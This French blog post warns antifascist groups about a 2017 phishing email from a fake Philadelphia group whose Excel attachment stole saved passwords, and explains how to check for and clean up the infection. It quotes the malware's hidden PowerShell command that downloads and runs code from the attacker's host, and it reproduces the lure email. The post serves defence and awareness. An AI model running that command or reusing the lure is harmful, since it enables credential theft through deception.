[mis à jour le 13/12/2017] Vigilance sur un virus propagé par un faux groupe « Antifa de Philadelphie »

Mise à jour du 13/12/2017 :

Modifications des étapes pour vérifier la présence du virus.

Ajout du paragraphe « le virus a cessé de fonctionner ».

Une attaque informatique visant le mouvement antifasciste ?

Depuis une semaine des groupes antifascistes hexagonaux ont reçu un mail provenant d’une adresse PhillyAntifaContact@protonmail.com qui se font passer pour des camarades de Philadelphie afin d’infecter les ordinateurs de militants antifascistes. Avec cet email, une pièce jointe, qui en cas d’ouverture, permettait de récupérer des données informatiques sur l’ordinateur, il ne faut surtout pas ouvrir la pièce jointe .

Plusieurs groupes antifascistes localisés partout en France nous ont confirmés avoir reçu ce mail.

Les antifascistes de Philadelphie, que nous avions rencontré en 2016, nous ont confirmé qu’ils et elles n’étaient pas à l’origine de ce message et que personne dans la ville n’en avait eu connaissance.

virus antifa 2017

Dans le message écrit en anglais que les groupes antifascistes ont reçu, l’intention était de monter un réseau international antifasciste. Une bonne initiative mais à faire avec des personnes que l’on connaît, et sûrement pas virtuellement.

Comment le virus fonctionne ?

Dans ce mail, il était demandé de remplir un formulaire (en pièce jointe) si on était intéressé par leur initiative. En plus d’afficher un formulaire (au format Excel), un script était exécuté qui permettait de déclencher l’attaque qui consistait à récupérer un maximum de mots de passe enregistrés dans votre ordinateur (voir l’image pour avoir la liste complète).

L’objectif : récupérer des mots de passes sensibles, par exemple ceux servant à protéger le site ou la boîte mail de votre groupe. Vous avez pu, par exemple, les enregistrer dans votre navigateur, votre client mail, etc.

La méthode : cette attaque exécute 2 actions : elle récupère vos mots de passe et ajoute une tâche planifiée nommée « AudioDriverUpdater » (permettant de recommencer à intervalle régulier la récupération des mots de passe).

Seuls les utilisateurs de Windows sont touchés.

Le virus a cessé de fonctionner le jeudi 30 novembre : le site contenant les programmes d’attaque a pu être fermé rapidement (le mail a été envoyé environ le 28 novembre). Donc si vous avez ouvert la pièce jointe après cette date, vous n’avez pas été infecté (en cas de doute, faite la vérification).

Vous ou quelqu’un de votre groupe a ouvert la pièce jointe ?

N’hésitez pas à prévenir vos camarades, en particulier celui ou celle qui gère la boîte mail de votre groupe ou n’importe quelle adresse mail publique liée à l’antifascisme.

Si vous avez reçu le mail et que vous avez un doute sur le fait d’avoir ouvert ou non la pièce jointe, vérifiez quand même que vous n’avez pas été infecté.

Pour vérifier que vous avez été infecté, la procédure dépend de votre version de Windows :

Windows 8 et 10 :

 Ouvrir le « Planificateur de Tâches » : pour cela, il faut aller dans le menu « Démarrer », ouvrir le « Panneau de configuration » puis « Système et sécurité », « Outils d’administrations » et enfin « Planificateur de tâches ». Si vous n’arrivez pas à le trouver : https://www.isunshare.com/windows-8/open-windows-8-8.1-task-scheduler.html

 Cliquer sur l’onglet « Bibliothèque du planificateur de tâches » à gauche et vérifier dans les différentes tâches qu’aucune ne porte le nom « AudioDriverUpdater » (voir la capture d’écran ci-dessous)

 Si cette tâche est présente, votre ordinateur a été infecté. Vous pouvez vous en assurez en sélectionnant cette tâche, et en allant dans l’onglet « Actions », vous devriez voir quelque chose de ce type : ’powershell.exe -NoP -Sta -NonI -W Hidden iex (wget http://phiant.hopto.org/UpdateXXXXXX)’ (où le XXXXXX dépend de votre ordinateur).

Supprimez cette tâche immédiatement.

 Si vous ne voyez pas cette tâche, c’est que votre ordinateur n’a pas été infecté

virus antifa 2017 2

Windows 7  :

 Il va falloir vérifier quelle version de PowerShell est installé sur votre ordinateur

 Ouvrir PowerShell (si vous ne savez pas comment faire : http://syskb.com/comment-lancer-powershell-2-0-sur-windows-seven-et-windows-server-2008/)

 Taper la commande $PSVersionTable dans la fenêtre PowerShell puis appuyer sur ‘Entrée’.

virus antifa 2017 3


 La version apparaît sur la ligne ‘PSVersion’ : si c’est 5.0 ou plus, alors les mots de passe ont pu être compromis (voir image ci-dessous)

Ordinateur i nfecté  :

Si votre ordinateur a été infecté il vous faut impérativement changer tout les mots de passe qui sont enregistrés dans votre ordinateur (n’oubliez pas les comptes non-enregistrés sur votre ordinateur qui utilisaient un de ces mots de passe infectés).

Et n’oubliez pas de supprimer la tâche planifiée sur Windows 8 ou 10.

Comment se protéger de ce genre d’attaque à l’avenir ?

D’une manière générale, méfiez-vous des pièces jointes envoyées avec des adresses mails qui vous sont inconnues. Dans notre cas, il semble qu’Excel produisait une alerte vous demandant la permission d’exécuter le script : soyez vigileant à ce genre d’alerte.

La particularité de cette attaque est qu’elle était très ciblée, elle a justement été faite pour qu’on ne se méfie pas de la pièce jointe et qu’on soit tenté de l’ouvrir comme si de rien n’était. Comme le montre le contenu du mail (à la fin de l’article), cette attaque visait directement des groupes antifascistes français, voire européen.

La leçon technique de cette attaque est de ne pas enregistrer ses mots de passe dans le navigateur ou dans d’autres logiciels non sécurisés . Si vous avez besoin de sauvegarder des mots de passe, utilisez plutôt KeePassX (https://www.keepassx.org/downloads).

G râce à des camarades réactifs, cette attaque n’a pu avoir, à priori, qu’un impact limité .

Il y a un travail de formation important à faire dans nos milieux : il faut apprendre à mieux utiliser l’outil informatique et à se protéger davantage sur internet .

Plus généralement, n ous fournissons bien trop facilement d es informations qui n e devraient pas à être connus, ni des fascistes, ni des forces répressives de l’État. Ces informations leur permet tent d’avoir un coup d’avance sur nous, de savoir ce qu’on fait, ce qu’on se dit, ce qu’on organise ensemble. Ils sont en mesure de freiner des luttes, des mouvements sociaux mais aussi d’alourdir l es peines d’ une justice qui nous considère terroriste .

Cet article sera mis à jour si de nouvelles informations nous parviennent.

Nous reviendrons prochainement pour un article plus général sur la sécurité informatique.

Annexe – contenu du mail :

Dear french comrades, We are an american anti-fascist group based in Philadelphia, and would like to relate with others countries to extend the reach of our fight. If we do coordinated actions in various countries, we believe that our claims will be much more listened to and together we shall beat the growing amount of racists and fascists that exist in our countries. You have received this email because we found it on your website or on the social medias, and your group seems very active, so we invite your to join our organisation. Of course you will keep your independance, and will only receive informations and advice on when and what to fight. This is, for now, a simple and quick registration in our force assessment. If you agree to make contact with us please fill the joint excel file. For security and privacy reasons no name has to be given, only numbers, and contact information of people to be directly contacted. Then send it back and the rest of the information will follow. "As Antifa, we exist to combat fascism, racism, homophobia, transphobia, sexism, anti-Semitism, Islamophobia and all forms of oppression. We must reject the repression and intimidation tactics the police are trying to impose on us. We will not stop fighting, we will not be subdued and we will not be silenced." Keep fighting, Philly Antifa